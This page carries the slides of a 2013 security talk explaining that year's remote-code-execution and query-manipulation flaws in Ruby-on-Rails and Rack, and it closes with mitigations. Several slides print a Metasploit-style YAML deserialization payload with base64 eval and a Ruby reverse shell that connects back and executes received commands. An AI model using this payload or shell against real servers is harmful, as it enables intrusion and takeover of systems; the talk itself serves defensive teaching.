SlideShare una empresa de Scribd logo

Ruxmon feb 2013 what happened to rails

S
snyff

Talk I did in February 2013 during Ruxmon monthly meeting

Tecnología
1 de 30
Descargar para leer sin conexión
What happened to Ruby- on-Rails? Louis Nyffenegger louis@pentesterlab.com @snyff
About me... ● Independent security consultant: ○ Code review ○ Training ○ Penetration testing ● Work on really cool stuff in my free time: ○ https://pentesterlab.com/exercises ○ https://pentesterlab.com/bootcamp/
Ruby-On-Rails ● Ruby framework to develop web applications ● Protect from most web security issues: ○ SQL injections ○ Cross-Site Scripting ○ Cross-Site Request Forgery ● Good reputation... including security wise
What happened to Rails? ● Recently a lot of vulnerabilities have been published in Ruby-On-Rails ● In the past, most vulnerabilities were low-risk issues but nothing really bad ● This time we're talking remote code execution
Rails Security: The usual suspects... @benmmurphy @joernchen @tenderlove @homakov @charliesome @postmodern_mod3
Non technical reasons ● People assumed it was secure ● More and more used: ○ more users -> more targeted ○ if an application didn't get any bug published it's probably because no one cares ● A lot of Ruby hackers: ○ Ruby-on-Rails devs ○ People looking for bugs in Ruby-on-Rails and Ruby-on- Rails applications
It all started... CVE-2012-5664 ● Talk from Joernchen (Phenoelit) at ZeroNights: "Let me github that for you" (21/12/2012) ● Rack Session (used by Rails): ○ base64(Marshal(data))--HMAC(SHA1(base64(Marshal (data)), secret) ● PentesterLab's exercise on this: https://pentesterlab. com/rack_cookies_and_commands_injection. html
It all started... CVE-2012-5664 ● Session's secret exposed on Github: ○ Arbitrary session modifications ○ SQL injection if you know the secret and the application uses authlogic ● Limited risk based on this... in theory
It all started... CVE-2012-5664 ● As always... Twitter started screaming and loling on this bug... ○ signal vs noise :/ ● A lot of people (including me) thought it was only exploitable in this condition: http://blog.pentesterlab.com/2013/01/on-exploiting-cve- 2012-5664.html http://blog.phusion.nl/2013/01/03/rails-sql-injection- vulnerability-hold-your-horses-here-are-the-facts/
It all started... CVE-2012-5664 ● If you want to do something like: http://vulnerable/id[:select]=password from users ● Rails prevents this ○ if you submit a hash, all keys get converted to Strings. ○ then, Rails check that the keys submitted are valid symbols: def assert_valid_keys(*valid_keys) unknown_keys = keys - [valid_keys].flatten raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}") unless unknown_keys.empty?
All could have happily stop here... but people started digging to find a way around this...
And turned out... ● Rails can do a LOT of stuff... ○ parse traditional requests ○ parse XML request ○ parse JSON request ● And you can send YAML inside JSON and XML requests...
YAML ● "YAML is a human-readable data serialization format "(Wikipedia). --- receipt: Oz-Ware Purchase Invoice date: 2007-08-06 customer: given: Dorothy family: Gale
YAML inside XML... <?xml version="1.0" encoding="UTF-8"?> <blah type="yaml">--- !ruby/hash:... </blah>
From YAML to code execution ● To translate that in the OS world: "you have FTP access to a system and want to get commands execution from it" ● Need to find a way to inject code and get it executed... ● Many methods more or less reliable depending on the version of Ruby and Ruby- On-Rails
From YAML to code execution: msf way <SWfzexMD type='yaml'>--- !ruby/hash: ActionController::Routing::RouteSet:: NamedRouteCollection 'XIH; eval(%[Y29k... KZW5k].unpack(%[m0])[0]);' : !ruby/object: ActionController::Routing::Route segments: [] requirements: :tFuEk: :jyWUTgfc: :CAxk </SWfzexMD>  
From YAML to code execution: msf way ● You basically inject code that will get evaluated by Ruby-On-Rails automatically ● The same vulnerability can also be used to get SQL injection using Arel ● From the code evaluated, msf does its usual stuff: ○ fork ○ connect back
From YAML to code execution: msf way code = %(cmVxdW...ml9).unpack(%(m0)).first if RUBY_PLATFORM =~ /mswin|mingw|win32/ [...] else if ! Process.fork() eval(code) rescue nil end end
From YAML to code execution: msf way require 'socket'; c=TCPSocket.new("[::1]","4444"); $stdin.reopen(c); $stdout.reopen(c); $stderr.reopen(c); $stdin.each_line {|l| l=l.strip next if l.length==0 system(l) }
CVE-2013-0156... only POST? ● Only POST? ○ you need to send the XML in the body of the request... ● You can do a POST request and use the HTTP header: "X-HTTP-Method- Override: get" to get Rails to use your payload as if it was in a GET request
CVE-2013-0155 ● "Unsafe Query Generation Risk in Ruby on Rails" (not SQL injection) using JSON ● Depends on the code used user = User.find_by_token(params[:token]) -> SELECT * FROM users where token=... ● You can manipulate the query using JSON to remove the WHERE statement: -> SELECT * FROM users
Rack ● "Rack provides a minimal interface between web servers supporting Ruby and Ruby frameworks." ● Used by Rails and other frameworks ● Two vulnerabilities published in the same period: ○ CVE-2013-0262 ○ CVE-2013-0263 (already reported in 2009)
Rack... CVE-2013-0263 def digest_match?(data, digest) return unless data && digest @secrets.any? do |secret| digest == generate_hmac(data, secret) end end
Rack... CVE-2013-0263 ● Timing attack... ○ Create a malicious value ○ Bruteforce a valid HMAC ■ send HMAC "aaaaaaaaaaa..." ■ send HMAC "baaaaaaaaaa..." ■ send HMAC "caaaaaaaaaa..." ■ ... ■ compare responses' time ● Unlikely from Internet ○ "intercloud" attacks...
CVE-2013-0277 ● Rails allows developers to store serialized data easily: class Post < ActiveRecord::Base serialize :tags end ● Turns out the serialisation is done using YAML... If a user can manipulate this parameter... game over :/
Rack... CVE-2013-0262 ● Directory traversal in Rack::File ● When I looked at the bug I found a XSS in the same code ○ and another one in similar code in another file fail(404, "File not found: #{path_info}" ○ and the fact that rack follows symlinks ● Turns out this is used by BEEF... Content- Type: text/plain limits impact tho
Rubygems.org compromised ● Gem == ruby library ● Rubygems is like a Debian mirror for Ruby ● Information about a package are stored inside a metadata.gz which is a compressed YAML file... and this information get displayed on the website: ○ Someone uploaded an "exploit.gem"...
So what to do from now? ● ".to_s all the things" ○ most of the issues come from the mapping performed by Ruby-On-Rails ● Upgrade... (bundler-audit) ● Remove parsers you don't need: ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML) ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)
And since we are talking about Rails Someone recently put together all the way to have vulnerable code in Ruby-on-Rails: http://rails-sqli.org/ You should also check Meder's Ruby Security Reviewer's Guide: http://code.google.com/p/ruby- security/wiki/Guide
Ruxmon feb 2013 what happened to rails

Recomendados

Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystackssnyff
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositoriessnyff
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5usnyff
 

Recomendados

Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystackssnyff
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositoriessnyff
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5usnyff
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...Codemotion
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Pwnstaller
PwnstallerPwnstaller
PwnstallerWill Schroeder
 
ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV Sergey Belov
 
20120307 CakePHP Study in Tokyo
20120307 CakePHP Study in Tokyo20120307 CakePHP Study in Tokyo
20120307 CakePHP Study in Tokyoichikaway
 

Más contenido relacionado

La actualidad más candente

Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...Codemotion
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 

La actualidad más candente (20)

Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackers
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
Carlo Sciolla - Above and beyond type systems with clojure.spec - Codemotion ...
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 

Destacado

ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV Sergey Belov
 
20120307 CakePHP Study in Tokyo
20120307 CakePHP Study in Tokyo20120307 CakePHP Study in Tokyo
20120307 CakePHP Study in Tokyoichikaway
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Pichaya Morimoto
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
CSCE "Rails Mass Assignment"
CSCE "Rails Mass Assignment"CSCE "Rails Mass Assignment"
CSCE "Rails Mass Assignment"Lukas Klein
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Pichaya Morimoto
 
IE Memory Protector
IE Memory ProtectorIE Memory Protector
IE Memory Protector3S Labs
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesPichaya Morimoto
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsMikhail Egorov
 
Ruby on Rails Penetration Testing
Ruby on Rails Penetration TestingRuby on Rails Penetration Testing
Ruby on Rails Penetration Testing3S Labs
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APISergey Belov
 

Destacado (20)

ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV
 
20120307 CakePHP Study in Tokyo
20120307 CakePHP Study in Tokyo20120307 CakePHP Study in Tokyo
20120307 CakePHP Study in Tokyo
 
Rails and security
Rails and securityRails and security
Rails and security
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Кеширование данных в БД
Кеширование данных в БДКеширование данных в БД
Кеширование данных в БД
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
CSCE "Rails Mass Assignment"
CSCE "Rails Mass Assignment"CSCE "Rails Mass Assignment"
CSCE "Rails Mass Assignment"
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Practice of AppSec .NET
Practice of AppSec .NETPractice of AppSec .NET
Practice of AppSec .NET
 
Cloud Orchestration is Broken
Cloud Orchestration is BrokenCloud Orchestration is Broken
Cloud Orchestration is Broken
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
 
IE Memory Protector
IE Memory ProtectorIE Memory Protector
IE Memory Protector
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind Vulnerabilities
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
 
Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applications
 
Ruby on Rails Penetration Testing
Ruby on Rails Penetration TestingRuby on Rails Penetration Testing
Ruby on Rails Penetration Testing
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server API
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 

Similar a Ruxmon feb 2013 what happened to rails

DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...Felipe Prado
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing DevelopmentCTruncer
 
May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.
May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.
May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.Leszek Mi?
 
Node in Real Time - The Beginning
Node in Real Time - The BeginningNode in Real Time - The Beginning
Node in Real Time - The BeginningAxilis
 
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetupAvoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetupDavide Cioccia
 
Course_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptxCourse_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptxssuser020436
 
Hitbkl 2012
Hitbkl 2012Hitbkl 2012
Hitbkl 2012F _
 
Remote file path traversal attacks for fun and profit
Remote file path traversal attacks for fun and profitRemote file path traversal attacks for fun and profit
Remote file path traversal attacks for fun and profitDharmalingam Ganesan
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsOWASP Kyiv
 
Kettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleKettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleDefconRussia
 
Experiences building a distributed shared log on RADOS - Noah Watkins
Experiences building a distributed shared log on RADOS - Noah WatkinsExperiences building a distributed shared log on RADOS - Noah Watkins
Experiences building a distributed shared log on RADOS - Noah WatkinsCeph Community
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 

Similar a Ruxmon feb 2013 what happened to rails (20)

DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
 
May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.
May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.
May The Data Stay with U! Network Data Exfiltration Techniques - Brucon 2017.
 
Node in Real Time - The Beginning
Node in Real Time - The BeginningNode in Real Time - The Beginning
Node in Real Time - The Beginning
 
Go at Skroutz
Go at SkroutzGo at Skroutz
Go at Skroutz
 
Full stack development
Full stack developmentFull stack development
Full stack development
 
JavaScript Event Loop
JavaScript Event LoopJavaScript Event Loop
JavaScript Event Loop
 
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetupAvoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
 
Course_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptxCourse_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptx
 
Node.js in production
Node.js in productionNode.js in production
Node.js in production
 
Hitbkl 2012
Hitbkl 2012Hitbkl 2012
Hitbkl 2012
 
Nodejs
NodejsNodejs
Nodejs
 
Remote file path traversal attacks for fun and profit
Remote file path traversal attacks for fun and profitRemote file path traversal attacks for fun and profit
Remote file path traversal attacks for fun and profit
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tips
 
Kettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleKettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in style
 
Experiences building a distributed shared log on RADOS - Noah Watkins
Experiences building a distributed shared log on RADOS - Noah WatkinsExperiences building a distributed shared log on RADOS - Noah Watkins
Experiences building a distributed shared log on RADOS - Noah Watkins
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
Nodejs
NodejsNodejs
Nodejs
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 

Último

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
